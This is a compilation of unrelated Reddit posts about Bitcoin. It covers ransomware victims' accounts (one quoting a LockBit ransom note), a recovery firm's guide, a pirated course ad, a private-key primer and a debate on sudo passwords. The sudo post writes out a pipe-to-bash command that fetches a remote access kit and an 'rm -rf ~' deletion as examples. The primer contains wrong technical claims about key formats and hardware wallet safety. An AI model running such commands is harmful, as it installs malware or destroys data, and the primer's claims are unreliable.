Remove Bitcoin ransomware (Virus Removal Instructions

Disturbing Bitcoin Virus: Encrypts (instead of deleting) victims files, then demands transaction ID to decrypt proving they made a 2BTC payment to attacker... QuickBT received 2 separate calls about this just yesterday...

Preface: We allow Canadians to buy .4 Bitcoin quickly using debit.
As the title describes, yesterday we received a panic call from an innocent business owner who's business files (this virus targets AutoCAD, Illustrator, Quickbooks, powerpoint and other business file.ext's) had been encrypted by this virus. His staff and business were at a standstill until he could buy "Bitcoin" (which of course he had never heard of and this was such a great first exposure for him...)
Apparently, the virus gave him an address, and was requested a transaction ID proving he made the payment. He only has 30 hours to do so, and cannot sign up for exchanges etc.
Has anyone else heard of this? It's TERRIBLE the more we think about it.
We are extremely reluctant to facilitate this type of transaction. However we CAN help very easily using our system.
If you goto a bank to take out ransom money to get a child back, is the bank complicit? One option we are considering is requiring a police report and approval, however we are simply fuelling this scam then...
Thoughts?
EDIT: Apologies to the community for the aggressive "Bitcoin Virus" title. We can't change it now, but we will be more careful in the future not to slander the Bitcoin brand. We were just upset at how powerful this ransomware could be.
EDIT 2: Fast forward a few years - those attacks were common for a bit, but now security is stronger and taken far more seriously by consumers :) We are doing what we can: https://quickbt.com/pdf/20131010_QuickBT_and_cybercrime_requests.pdf
submitted by QuickBT to Bitcoin [link] [comments]

Bitcoin mentioned around Reddit: Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up /r/besteurope

Bitcoin mentioned around Reddit: Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up /besteurope submitted by BitcoinAllBot to BitcoinAll [link] [comments]

Customer hit with crypto-virus looking for advice

Have a customer hit with a Crypto virus on the 11th only just told us today. Able to retrieve company files from shadow copies on NAS but PC running QuickBooks is past point of no return.
First question is, files have .smile at the end, does anyone have any ideas what virus may have infected the system?
Second question, customer is prepared to pay ransom, against my advice he emailed them and they want .5 of a bitcoin. I'm not advocating this but he wants to try. What's the safest way to buy Bitcoin?
We know and he knows he should have backups in place, he was meant to take manual backups of QuickBooks but for whatever reason it did not happen, I'm not looking to portion blame and lesson has been learned.
Just looking for some guidance and advice on options.
Thanks guys.
EDIT: Thanks for all the input, everyone has been so helpful. We managed to figure out the virus was one of two MedusaLocker or GlobeImposter 2.0. Neither have a public decrypter and unlikely to be one due to a unique key assigned to each encrypted PC. Determined that source was an email with a zip file disguised as a .odt file. Police were called but referred to a site already recommended on this post. No cyber cover in insurance. Most files now recovered but some that can't and deciding whether to pay ransom or rebuild files. Post has been really helpful, wish I could share the amazing chocolate truffles that were supplied as a thanks.
submitted by dvdkp to msp [link] [comments]

How do I archive Ransomware files? (7zip)

I'm aware that files encrypted via viruses in the Crysis family are undecryptable until the creator releases the master key.
Knowing the history of users on bleepingcomputer forums releasing master keys to decrypt files, I'm counting on this slim chance to put my encrypted data in long-term storage until I have a chance to decrypt them.

This is not a "help me my files are encrypted" problem, but a "how do I compress encrypted video files if I can restore them in the future" type of question.



Backstory:
My son Jared was never the kind of kid that listened, he and his college buddies partied one night, his buddies were drunk, and was hit by a truck, only my son survived.
He had pieces of metal in his brain and needed to remove them surgically; I decided to put on a Go-Pro and record our journey, maybe someday we'll both look at these videos at laugh at each other.

To do his surgeries, I borrowed as much money as I could, even taking out my 401k with penalty. After three years of fighting, he had a brain infection on his left brain and was in a vegetated state, I was not financially capable of helping him, and I made a decision I still regret to this day... to cut off his life support.

It was the worst moment in my life, but I had accumulated terabytes of recordings, like him doing dumb things and telling inappropriate jokes, I often look at these recordings when I'm feeling down.

Last year, I was traveling to see my stepmother. Stupid as I am, I Googled how to remotely control my computer, as I wanted to look at my computer when I'm able to. I was recommended with windows rdp, not knowing what security risk it poses, I opened up my system to the interwebs, and made it vulnerable to hackers.

I was devastated when I came home, my work files are gone, that's fine for me, but my videos. Everything I worked for is now unopenable, attached with a ransom note demanding me to contact "support," the hackers asked for $5000 in bitcoin, I'm not a rich guy, and I do not have that kind of money.

After doing my research, I figured out how everything (technical) happened, but at this point, I'm counting on another computer guru to release a master key to decrypt these files.
All these files have their original file name, with an id, an email, and ends with .harma.

For now, I just need to put them in storage. How can I lossless compress them? If I use lossy compression, will I still be able to uncompress and decrypt them if someday the master keys are released?
I'm willing to sit and wait, maybe ten years down the road, these computer hackers will find some good inside them.
submitted by FolleyMel779 to techsupport [link] [comments]

How Ransomware Encryption Happens & 4 Methods for Recovery

We know how overwhelming it can feel to be the victim of a ransomware attack and how your business cannot operate due encrypted or locked files. This page delivers insight on why your files were encrypted or locked, and the options you have to decrypt ransomware. As a ransomware recovery service provider, we have helped thousands of clients successfully recover their data and decrypt their data.
Evaluating all options will include analyzing the encrypted files, and the least desirable option to pay the ransom demand if necessary. Our process helps provide critical insight into decrypting ransomware and the available options that clients have.
By the end of this piece, it is our goal to show you what is involved to successfully recover your files. This guide outlines what steps and research are necessary to decrypt or unlock your files from a ransomware attack.

You’re the victim of a ransomware attack

You arrive to work and start noticing suspicious alerts coming from your servers, and none of the databases are functional. Your co-workers are frantic and cannot access any of their data. You investigate further and find all of the files on your network are renamed and discover ransom notes, and a screen asking you to email someone if you want your data back. You finally realize that you are a victim of a ransomware attack, and all of your files are locked or encrypted.

3 Common Ways Your Files Were Encrypted or Locked

Ransomware succeeds when businesses have poor security hygiene. Organizations that lack policies & procedures around data security will have a higher risk of ransomware attacks. Here are some of the most common ways to fall victim to a ransomware attack:

Open Remote Desktop Protocol Ports (RDP)

Businesses that have improperly configured network security may leave their Remote Desktop Protocol (RDP) ports open. Unknowingly, this is the equivalent of leaving the front door unlocked when you leave your home: it provides an opportunity for cyber attacks to come through with little deterrence.
Once a hacker is connected to your network, they can install ransomware and additional back doors to access your network at a later date. A large percentage of ransomware attacks still use this method of attack because so many organizations are not even aware of this security vulnerability.

Phishing Attacks

Ransomware can infiltrate your network by a malicious email campaign known as a phishing attack. Ransomware operators use massive networks of internet-connected devices (botnets) to send phishing emails to unsuspecting victims. These emails intend to trick the receiver into clicking on a malicious attachment or link, which can secretly install the ransomware virus or other malware.
Phishing emails are becoming increasingly difficult to detect as cybercriminals find clever ways to make a malicious email look legitimate. This underscores the importance of security awareness training for everyone in the organization, not just the I.T. department.

Compromised Passwords

The ransomware operators may have used previously compromised passwords from employees at your organization to gain unauthorized access to the networks. This derives from the poor security practices of reusing the same passwords for multiple accounts and authentication processes.
If your employees have been using old & weak passwords to access your business data, a cyber criminal can use a previously compromised password to initiate the attack. Remember to always to follow good password hygiene.
The variety of attack vectors highlights the importance of a digital forensics investigation that can help victims understand how the ransomware came onto your computer and what steps you can take to remediate the vulnerability.

4 Options for Ransomware Recovery

In this section, we cover the options to restore files encrypted or locked by ransomware.

1. Recover files with a backup

If your files become encrypted in a ransomware attack, check to see if you have backups to restore and recover (in order).

2. Recreate the data

Even though your files are encrypted by ransomware, you might be able to recreate the data from a variety of sources as outlined below:

3. Breaking the ransomware encryption

The harsh truth is that the majority of ransomware encryption is unbreakable. This impossibility is a tough concept for many of us to accept, given the technological advances of our society.
Does this mean you should skip looking into whether the ransomware encryption can be broken? This option should always be explored if presented by a ransomware recovery firm, although the final choice is yours to make. We will lay out a real life example at Proven Data below to outline why this was a great decision for a company that was infected with ransomware.
While it tends to be rare, there are poorly constructed ransomware encryptions that have been broken by security researchers. If you can avoid paying a ransom, you should at all costs.
There can be flaws in the malware or weaknesses in the encryption. Businesses can look at these options, especially if time is on your side. There are also free ransomware decryption resources that provide tools for previously decrypted ransomware variants. A client of ours had hired a ransomware recovery company to recover their files until we discovered at the very last moment through our analysis that the encryption was breakable. With less than 20 minutes to spare, we saved the client out of paying a $450,000 ransom.

Why can’t most ransomware encryption be broken?

Ransomware is a cryptovirus, which means it uses cryptography in combination with malware to lock your files. Modern cryptography uses sophisticated mathematical equations (algorithms) and secret keys to encrypt and decrypt data. If strong encryption is used, it can take thousands, if not millions of years to break the encryption given the strength of today’s computers.
Encryption is a security tool created with the intent of data protection. It is a defensive tool to provide security, privacy, and authentication. Sadly, ransomware attackers are using it as a weapon against innocent victims.

How do I know if the encryption can be broken?

You can start off with this free ransomware identification resource to determine the feasibility of decryption. You will need to upload the ransom note and a sample file into the ID-Ransomware website, and it will tell you if there is a free decrypter or if it is an unknown ransomware variant. Please note that the tool is not always 100% accurate. If the variant is still under analysis, you will need a malware or encryption analyst to determine whether or not there is a possibility for decryption.
Encryption is designed to be unbreakable, which is why security researchers can’t simply make a tool for ransomware decryption. These unbreakable encryptions protect our bank accounts, trade secrets, government data, and mobile communications, among other things. It would be a significant security concern if there were a master decryption tool that could break encryption algorithms.

4. Paying the ransom to decrypt ransomware files

If the encryption is too strong, the only way to obtain the decryption key for your files is to pay the ransom. Many ransomware victims don’t have time on their side because they are facing significant business disruption. Each minute that passes could be a lost client, or worse for a medical organization.
Here is a list of the most prevalent ransomware variants that are known to be “cryptographically secure,” which means that Proven Data or the security community has confirmed the encryption is unbreakable:

I don’t want to pay the hackers ransom.

Businesses and individuals have the option of choosing not to pay the ransom in a ransomware attack to regain access to their files. For personal, political, or moral reasons, there has been resentment of the ransomware economy, and victims do not have to engage in extortion. If paying the ransom is the only option, you should know what to expect before considering moving forward.

How a ransomware recovery specialist can help

If you do decide to use a ransomware recovery company and if there is one thing you get out of this article, it is this: You should always question how a ransomware recovery company is recovering your data. If you are unsure, asking the right questions will ensure a transparent experience:
A ransomware recovery specialist can analyze your current situation and determine what options are available to you at the time of the inquiry. A competent and experienced ransomware recovery company should be able to provide the following:
Understanding how your files were affected by ransomware in the first place will provide you with the insight needed to prevent another attack. Whether you choose Proven Data or another company to decrypt your ransomware files, it’s important to know what unknowns there may be out there.
Our threat intelligence that we’ve gathered from the thousands of previous cases enable you to make informed decisions in helping restore your data after a ransomware attack. If you require a company with such experience, we’re standing by to assist 24/7.
submitted by Proven_Data to u/Proven_Data [link] [comments]

The ultimate dark web anonymity privacy & security course free download - freecoursessites.com

Learn how to access & use the dark net and the clear net privately, anonymously and securely

Privacy And Security Course
Created by Zaid Sabih, z SecurityEnglish English [Auto-generated] What you’ll learn
Requirements
Description
Welcome to the ultimate dark net, privacy, anonymity and security course. With no prior knowledge required this course will take you from a beginner to advanced in all of these topics; teaching you how to properly and securely discover data and websites on both the dark web and clear web, access hidden (onion) services, communicate privately and anonymously using instant messages and email, manually use end-to-end encryption to protect your privacy and make it impossible to read even if it gets intercepted, sign and verify files, share files anonymously, transfer funds anonymously using crypto currencies such as Bitcoin and Monero and much more! You’ll also learn how to do all of this in a secure manner making it very difficult for hackers or other entities to hack you or de-anonymise you, and even if you get hacked these entities won’t be able to easily control your system or de-anonymise you.
This course is highly practical but won’t neglect the theory, first you’ll understand the inner-workings of each topic and each technique covered, then you’ll learn how to apply it in real-life scenarios ultimately teaching you how to use the dark net and the clear net in a more private, more anonymouse and more secure manner, so by the end of the course you’ll be able to combine the skills you learned and use them in any situation that requires more privacy, more anonymity or more security.
This Privacy And Security Course covers four main topics, I chose to cover all of these topics in one course because I think it is very difficult to learn one without the others as they are very related, these main topics are:
1. Anonymity – anonymity is a state where your identity is unknown, achieving this on the internet is not easy because of the way it is designed, so in this course you’ll learn a number of techniques to improve your anonymity, you’ll first learn what the TOR network is, understand how it works and how it can significantly improve our anonymity, then you’ll learn how to connect to it using the TOR Browser, using TAILS and using Qubes OS, you’ll also learn how configure TOR properly to bypass censorship and connect even if its blocked!
2. Privacy – Using an anonymising network such as TOR is not enough to stay private and anonymous because the operating systems we use (Windows, OS X, Linux) constantly collect data about us, therefore in this course you’ll learn how to use two operating systems designed to be more private, more anonymous and more secure; TAILS and Qubes OS, you’ll learn how to install these operating systems on a USB stick so you can use them on any computer without affecting the original operating system and without leaving any traces!
There’s also a fully section on encryption in which you’ll learn how the two main types of encryptions work (symmetric and asymmetric), what is end-to-end encryption and how to use it to encrypt / decrypt and sign / verify data, this allows you to privately communicate and share any sort of data; whether it is simple text, or files such as images, videos…etc without worrying about it being intercepted.
The course also contains a full section on crypto-currencies, because the payment methods we are used to use are not private and not anonymous, so in this section you’ll learn about block chains, crypto-currencies is and how they work, and how to anonymously obtain two crypto currencies; Bitcoin and Monero and use them to send / receive funds.
3. Dark Net – This is the portion on the internet that is not indexed by search engines and require special configuration to access. Using anonymising networks and privacy-focused operating systems are 2 steps in the right direction of becoming more private and more anonymouse but unfortunately it is not enough, the services we use everyday are not private and constantly collect data about us, so the the search engines (Google or Bing), the email provers (ex: Gmail, or Yahoo), the instant messaging platforms (Whatsapp or Skype), the file sharing services (Dropbox or Google Drivet) ….etc all of these services are not private, not anonymouse and can be used to track us and de-anonymise us. Therefore in this course I will teach you how to carry out your normal day-to-day tasks in a more private and anonymous manner, so first I’ll teach you how to search for websites and content on both the clear net and on the dark net, then I’ll tech you how to discover hidden services (onion services) to carry out your normal day-to-day tasks privately and anonymously (such as communicating using emails, or instant messages, file sharing….etc) – Privacy And Security Course
4. Security – All of the above will drastically enhance your anonymity and privacy and allow you to access both the dark web and the clear web privately and anonymously, but if you get hacked, the hacker will gain control over your system and therefore will be able to easily bypass whatever anonymity techniques you’re using and de-anonymise you, so all of the above is useless without security. Therefore in this course I will teach you how to do all of the above securely, then at the last section of the course I’ll show you how to take your security to the next level by dividing your operating system into a number of security domains, these domains are completely isolated and used for different purposes, therefore even if you get hacked only a small portion of your system will be compromised and it would be very difficult for the hacker to compromise the entire system or de-anonymise you.
With this course you’ll get 24/7 support, so if you have any questions you can post them in the Q&A section and we’ll respond to you within 15 hours.
Notes:
Who this course is for:
Size: 6GB
Download link: https://www.freecoursessites.com/the-ultimate-dark-web-anonymity-privacy-security-course-free-download/
submitted by free_tutorials to u/free_tutorials [link] [comments]

What Is Bitcoin Private Key: Beginner’s Guide

What Is Bitcoin Private Key: Beginner’s Guide
Most of the people in this sub probably already know what the Bitcoin private key is and how it works, but there are many newcomers who do not fully understand all the technical aspects of it. I hope you guys will find it useful.

Bitcoin Private Keys: The Basics

Let’s start with some main principles.
  • A private key is functionally similar to a password to your email account. Unlike your email address, you never share it.
  • You need your private key to be able to receive the crypto someone sends you and to have access to your funds.
  • The BTC network does not store your private keys, they are generated and stored by the wallet software. There are different types of wallets.
IMPORTANT: The private key concept does not apply exclusively to Bitcoin. Other cryptocurrencies use it too.
Now, let’s see how a private key looks and works.

Bitcoin Private Key Definition

Bitcoin private key is an alphanumeric piece of code. It includes letters and numbers, just like your public address.
However, while a public address is like your plastic card number, a private key is like your CVC. You know, those secret three digits on the back of a card?
A private address is created in a random manner when you get a cryptocurrency wallet. The possibility of creating two identical private keys is almost zero, due to the sophisticated encryption algorithm, we apply for the purpose.
In the BTC network, a private key contains 256 symbols, as we obtain it using the SHA256 encryption algorithm. This function always returns 256 symbols, no matter the input.

Bitcoin private key in various formats, including WIF.

Wallet Import Format (WIF)

Using such a long string of code is inconvenient, so a private key is often presented in WIF (Wallet Import Format). It’s a shortened version that includes only 51 characters (numbers from 0 to 9 and letters in the range of A-F) and begins with 5.
Here is a Bitcoin private key example in WIF:
5Kb8kLf9zgWQnogidDA76MzPL6TsZZY36hWXMssSzNydYXYB9KF
WIF has a few advantages over a full BTC private key version. As we have said, it’s shorter and more convenient to use. Also, it contains special pieces of code that serve to check the address for typos and correct them automatically.
WIF associates with only one private key and can be easily converted back into it, using an established algorithm.

Encrypting Private Keys

If a key looks like WIF but starts with 6, it is an encrypted version of a private key. People encrypt keys to ensure an extra layer of protection. To obtain such a string of code, we apply another algorithm. To decode (decrypt) the key we need to enter the password that we set when we were encrypting it.

How Bitcoin Private Key Works

You probably know Bitcoin as a digital payment system. To explain how it works, it would be better to compare it to a web-messenger, with massages transferring value. These ‘value messages’ are BTC transactions.
And what role a private key plays in sending these financial messages?
Let’s take a look at a real-life example.

https://preview.redd.it/fgtn8h63veu41.png?width=1261&format=png&auto=webp&s=9855f9aba70ebe7ca1f02b32c160ae78b2b42400

Using Private And Public Keys For a Transaction

Imagine you are sending 1 BTC to your friend Bill. You create a transaction and indicate yourself as the sender and Bill as the receiver of this amount. Then, you will broadcast the transaction to make the Bitcoin network aware of it.
  1. You start by choosing a private key. Using a special encryption algorithm, you derive a public key from it. You send this public key to Bill.
  2. You create a message for Bill and sign it with your digital signature. To obtain it, you pass your private key through a special encryption algorithm and attach the resulting code to the message. Every signature is unique, and you can use the same private address to produce an infinite number of them.
  3. Bill receives your message, public key, and signature and passes it through a signature algorithm. If it’s the message you sent, the algorithm returns ok.
Why we need a digital signature in the first place? There are three reasons. First, it tells the recipient that the message is from the sender he knows. Second, a digital signature makes it impossible for the sender to deny he sent the message. Third, it confirms that no one has altered the message in transit.
Unlike a traditional signature, a digital one cannot be forged. To produce it, you have to possess a secret private key.
https://preview.redd.it/k8n0vcg4veu41.png?width=624&format=png&auto=webp&s=9ab6c0bc25c0a638c4d3bfdbf86056f5462aa7d0

Why Keeping Your Private Key Secret Is Important

As we have mentioned, anyone in possession of your private key can steal your funds anytime.
If your wicked colleague Alice gets your private key (because you carelessly left your paper wallet on your desk), she can use it to create a digital signature. She can then use that signature to sign a transaction that will look like yours for the network. For instance, Alice can send all your crypto to another address. You will never be able to cancel this transaction and you are highly unlikely to know that she made it.
For this reason, you should be very careful with your private keys. Never send it to anyone using a messenger, or an email client, or a social media channel. Don’t share photographs of your private key. Never store a private key in a Google Doc file.
Please note that some desktop wallet apps store your private key in a standard directory on your hard drive. This place is a honeypot for hackers who know you are a cryptocurrency user. That’s why it’s extremely important to have up-to-date anti-virus software installed on your device.
https://preview.redd.it/bg2zd50aveu41.png?width=723&format=png&auto=webp&s=0e692f5c73c7c68ea854342b7fbeaf6aaa62f71f
Also, you may encrypt this wallet file to make it immune to malware. Many wallet apps provide this option. You will have to set a password to decrypt the private key, and the hacker will have to break this password to do it. If the password is strong, it will be a really difficult and time-consuming task.

Where To Store Private Keys: Mobile, Desktop And Hardware Wallets

As we have mentioned, the Bitcoin network does not store these keys. Instead, wallet services do it.

Mobile Wallets

Some of them allow you to keep and protect your private key, others do it automatically, applying various safety measures like 2FA or encryption. Note that nobody is responsible for it, your bitcoins will be gone if the service is hacked.

Desktop Wallets

Desktop wallets may be a good option. They provide a BTC public and private keys in the format of a file that you can download and import. You can protect this file with a strong password and safely store it on a hard drive. Don’t forget about safe storage for this drive, too. For instance, use a bank vault for this purpose.

Cold (Hardware) Wallets

Hardware wallets are the safest ones. They are small USB devices designed to store your funds and private keys offline, away from anyone who could steal them. For this very reason, hardware (or cold) wallets are impossible to hack. If you accidentally lose, damage or destroy such a device, you can recover your BTC and private keys using a backup phrase. The best-selling models of hardware wallets are Tresor and Ledger Nano S, supporting several popular coins.

https://preview.redd.it/7wlozgvcveu41.png?width=803&format=png&auto=webp&s=9c438a47a47f6bb2ba5dbd4fdfba924e8c960f47

Paper Wallets

These wallets are sheets of paper with BTC private keys and public address printed on them. Paper wallets look pretty basic and not very innovational, but it’s a safe way to store your BTC-related sensitive data. The main reason is that they are not connected to the Internet and thus are unreachable for malware attacks. This format is also immune to many mishaps that can affect electronic devices. To create a paper wallet you use a special web service like WalletGenerator.

P.S. Check out our blog if you are interested in more articles on crypto and finance
submitted by EX-SCUDO to btc [link] [comments]

CMV: Requiring a password for "sudo" access on desktop Linux systems is nothing but security theater.

Furthermore: on desktop systems it is perfectly fine to put NOPASSWD:ALL in your /etc/sudoers and similar in /etc/polkit-1/rules.d. In fact, I think this should be the default so users do not get a false sense of security.
For clarity, I'm not saying that all accounts should have sudo access, just saying that there's no meaningful security distinction between "sudo access with password" and "sudo access without password", and the "with password" path does nothing but wasting the user's time and giving them a false sense of security.
Argument #1: compromising a user account effectively compromises everything you care about.
As the relevant XKCD says, if your user account is compromised, the attacker cal already do everything he probably cares about. This includes:
Yes, you can run a remote access tool without root. Starting programs at boot does not require root (see systemctl --user, .bashrc, crontab -e, whatever). Internet access does not require root (see: your browser). I frequently see users thinking that remote access kits require root for some reason. Thanks to the X protocol, keylogging does not require root access either on most systems.
The uses for root-level access I can think of is (1) to infect other users of the system, and (2) to install a rootkit infecting your firmware to survive OS reinstallation. The alleged other users do most likely not exist on desktop systems, and only advanced viruses would put rootkits in firmware—viruses with that level of sophistication may as well use the following point to gain root access after compromising an user account.
Argument #2: compromising access to a user account with sudo access effectively compromises root, and a password check won't stop that.
If your account is in the sudoers file, actively used, and an attacker compromises your account, there are a bazillion ways to get access to root. Here are some examples:
Since Linux has made it effectively impossible to use a system without occasional root usage, you will elevate yourself to root at some point, and at that point the attacker will be able to steal said root access one way or another.
Often-heard counterargument: "If you allow sudo without password and leave your computer unattended without locking it, then some passerby may be able to sudo something, but if sudo required a password, he wouldn't have the time to do one of the advanced techniques above."
Reply: targeted attacks can "curl URL_OF_REMOTE_ACCESS_KIT_INSTALLATION_SCRIPT | bash". Random passerby trolls can ruin your day with "rm -rf ~". Both can be typed fairly quickly and neither requires root-level access.
Although I do consider myself a security-focused person, entering my password upon every sudo is still something I consider a waste of keystrokes and a source of security myths. Since the majority of the Linux world seems to disagree with me, I would like to know whether there's something major I'm overlooking.
submitted by ArchaicArchivist to changemyview [link] [comments]

Small Business Just Hacked. [email protected] encryption asking for Ransom Bitcoin. Need Advice.

As a primer, longtime lurker but complete novice when it comes to hacking so thanks for your patience.
A few hours ago one of our employee's computers had a ransom note pop up on it and many of our network files started getting encrypted. The computer also had a window on it that looked similar to a command prompt that showed time updates (see image) and the amount of files encrypted every 5 minutes.
The hacker demanded bitcoin be sent to the email [email protected] and left a .txt file in every folder that read:
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?81F3696546327500B4B15998DEEEE1D5 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about !!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on. Don't forget about GDPR.
Earlier today I opened up Remote Desktop from Windows Pro on her computer and configured port forwarding to her computer's IP. I also went into Windows Firewall on her computer and enabled all of the 'Remote Desktop' applications to bypass Firewall so the Remote Desktop would work properly. The employee whose computer was hacked was not working on her computer for about 5 hours leading up to the hack.
I guess my questions are:
  1. How can we track where this came from?
  2. Given she was not at her computer when this all happened, is this virus on a timer?
  3. How can we find out if other computers on our network are infect and will be on a timer as well?
  4. I am having a hard time believing that me opening up the computer to Remote Desktop is not somehow associated with the hack, but our IT admin insists it's not related. Could this have been the cause?
submitted by WIttyRemarkPlease to AskNetsec [link] [comments]

What Is Bitcoin Private Key: Beginner’s Guide

What Is Bitcoin Private Key: Beginner’s Guide
Most of the people in this sub probably already know what the Bitcoin private key is and how it works, but there are many newcomers who do not fully understand all the technical aspects of it. I hope you guys will find this guide useful.

Bitcoin Private Keys: The Basics

Let’s start with some main principles.
  • A private key is functionally similar to a password to your email account.
  • You need your private key to be able to receive the crypto someone sends you and to have access to your funds.
  • The BTC network does not store your private keys, they are generated and stored by the wallet software. There are different types of wallets.
Also, it is important to note that the private key concept does not apply exclusively to Bitcoin. Other cryptocurrencies use it too.
Now, let’s see how a private key looks and works.

Bitcoin Private Key Definition

Bitcoin private key is an alphanumeric piece of code. It includes letters and numbers, just like your public address.
However, while a public address is like your plastic card number, a private key is like your CVC. You know, those secret three digits on the back of a card?
A private address is created in a random manner when you get a cryptocurrency wallet. The possibility of creating two identical private keys is almost zero, due to the sophisticated encryption algorithm, we apply for the purpose.
In the BTC network, a private key contains 256 symbols, as we obtain it using the SHA256 encryption algorithm. This function always returns 256 symbols, no matter the input.
Bitcoin private key in various formats, including WIF.

Wallet Import Format (WIF)

Using such a long string of code is inconvenient, so a private key is often presented in WIF (Wallet Import Format). It’s a shortened version that includes only 51 characters (numbers from 0 to 9 and letters in the range of A-F) and begins with 5.
Here is a Bitcoin private key example in WIF:
5Kb8kLf9zgWQnogidDA76MzPL6TsZZY36hWXMssSzNydYXYB9KF
WIF has a few advantages over a full BTC private key version. As we have said, it’s shorter and more convenient to use. Also, it contains special pieces of code that serve to check the address for typos and correct them automatically.
WIF associates with only one private key and can be easily converted back into it, using an established algorithm.

Encrypting Private Keys

If a key looks like WIF but starts with 6, it is an encrypted version of a private key. People encrypt keys to ensure an extra layer of protection. To obtain such a string of code, we apply another algorithm. To decode (decrypt) the key we need to enter the password that we set when we were encrypting it.

How Bitcoin Private Key Works

You probably know Bitcoin as a digital payment system. To explain how it works, it would be better to compare it to a web-messenger, with massages transferring value. These ‘value messages’ are BTC transactions.
And what role a private key plays in sending these financial messages?
Let’s take a look at a real-life example.
https://preview.redd.it/lt1gwme8seu41.png?width=1261&format=png&auto=webp&s=87137c6ad2566affef82a6513090022f7dbb931e

Using Private And Public Keys For a Transaction

Imagine you are sending 1 BTC to your friend Bill. You create a transaction and indicate yourself as the sender and Bill as the receiver of this amount. Then, you will broadcast the transaction to make the Bitcoin network aware of it.
  1. You start by choosing a private key. Using a special encryption algorithm, you derive a public key from it. You send this public key to Bill.
  2. You create a message for Bill and sign it with your digital signature. To obtain it, you pass your private key through a special encryption algorithm and attach the resulting code to the message. Every signature is unique, and you can use the same private address to produce an infinite number of them.
  3. Bill receives your message, public key, and signature and passes it through a signature algorithm. If it’s the message you sent, the algorithm returns ok.
Why we need a digital signature in the first place? There are three reasons. First, it tells the recipient that the message is from the sender he knows. Second, a digital signature makes it impossible for the sender to deny he sent the message. Third, it confirms that no one has altered the message in transit.
Unlike a traditional signature, a digital one cannot be forged. To produce it, you have to possess a secret private key.

https://preview.redd.it/8ta8ds3jseu41.png?width=624&format=png&auto=webp&s=79186fecbe58ecd8a393f644ad35e590361fbe86

Why Keeping Your Private Key Secret Is Important

As we have mentioned, anyone in possession of your private key can steal your funds anytime.
If your wicked colleague Alice gets your private key (because you carelessly left your paper wallet on your desk), she can use it to create a digital signature. She can then use that signature to sign a transaction that will look like yours for the network. For instance, Alice can send all your crypto to another address. You will never be able to cancel this transaction and you are highly unlikely to know that she made it.
For this reason, you should be very careful with your private keys. Never send it to anyone using a messenger, or an email client, or a social media channel. Don’t share photographs of your private key. Never store a private key in a Google Doc file.
Please note that some desktop wallet apps store your private key in a standard directory on your hard drive. This place is a honeypot for hackers who know you are a cryptocurrency user. That’s why it’s extremely important to have up-to-date anti-virus software installed on your device.
https://preview.redd.it/187j0ucmseu41.png?width=723&format=png&auto=webp&s=c9bccdd66ffabde2e623846c7e95930d5e62a625
Also, you may encrypt this wallet file to make it immune to malware. Many wallet apps provide this option. You will have to set a password to decrypt the private key, and the hacker will have to break this password to do it. If the password is strong, it will be a really difficult and time-consuming task.

Where To Store Private Keys: Mobile, Desktop And Hardware Wallets

As we have mentioned, the Bitcoin network does not store these keys. Instead, wallet services do it.

Mobile Wallets

Some of them allow you to keep and protect your private key, others do it automatically, applying various safety measures like 2FA or encryption. Note that nobody is responsible for it, your bitcoins will be gone if the service is hacked.

Desktop Wallets

Desktop wallets may be a good option. They provide a BTC public and private keys in the format of a file that you can download and import. You can protect this file with a strong password and safely store it on a hard drive. Don’t forget about safe storage for this drive, too. For instance, use a bank vault for this purpose.

Cold (Hardware) Wallets

Hardware wallets are the safest ones. They are small USB devices designed to store your funds and private keys offline, away from anyone who could steal them. For this very reason, hardware (or cold) wallets are impossible to hack. If you accidentally lose, damage or destroy such a device, you can recover your BTC and private keys using a backup phrase. The best-selling models of hardware wallets are Tresor and Ledger Nano S, supporting several popular coins.

https://preview.redd.it/jmpyl3yoseu41.png?width=803&format=png&auto=webp&s=ef70101a853eaaedea8d0fb5d2d1690cce16c989

Paper Wallets

These wallets are sheets of paper with BTC private keys and public address printed on them. Paper wallets look pretty basic and not very innovational, but it’s a safe way to store your BTC-related sensitive data. The main reason is that they are not connected to the Internet and thus are unreachable for malware attacks. This format is also immune to many mishaps that can affect electronic devices. To create a paper wallet you use a special web service like WalletGenerator.

P.S. Check out our blog if you are interested in more articles on crypto and finance
submitted by EX-SCUDO to Bitcoin [link] [comments]

Discuss: Issues with Storing Bitcoins in long term.

First: Hodler here. Very bullish. Hodling for a decade more, not selling except for food n bills. I 100% agree with the economics of bitcoin.
Something that's not discussed much. IMHO storing BTC safely long term is challenging. Unlike keeping cash, gold at home. Bitcoin has a much larger attack area.
Possible issues not in cash/gold:
  1. Forget password for encrypted seed or wallet file
  2. Forget location of seed on paper, usb with seed. Part of multi sig. Misplaced, thrown by family, help
  3. Seed incorrectly written.
  4. Wrong seed written, when multiple wallets. People have lost BTC this way.
  5. Only private key written. Not realised it changes after a transaction.
  6. Fire, water damage. Same issue with cash.
  7. Bad ink fades away.
  8. Death.
None of the above exist with gold and one with cash. With death there are inheritances laws if the gold is in bank. At home, people at home know where gold is, no chance of misplacing or forgetting.
Haven't even started with theft: 1. Seed phrases online! dropbox, gmail, PC 2. BTC in online wallets! 3. Bad marriage. Spouse can take seed away in shoe sole. Plausible deny. No way to proof. Gold, cash are harder. and much harder with larger amounts. Gold is also kept in bank lockers by some. 4. Any family member can copy seed, use it in future if things go bad. 5. Fights in family - destroy seed in rage. 6. Tampered wallet software, hardware wallets. 7. malicious browser extensions 8. Hardware keyloggers, Virus, compromised router 9. Os bugs, Processor bugs, wallet software bugs 10. DNS hijacking, phishing
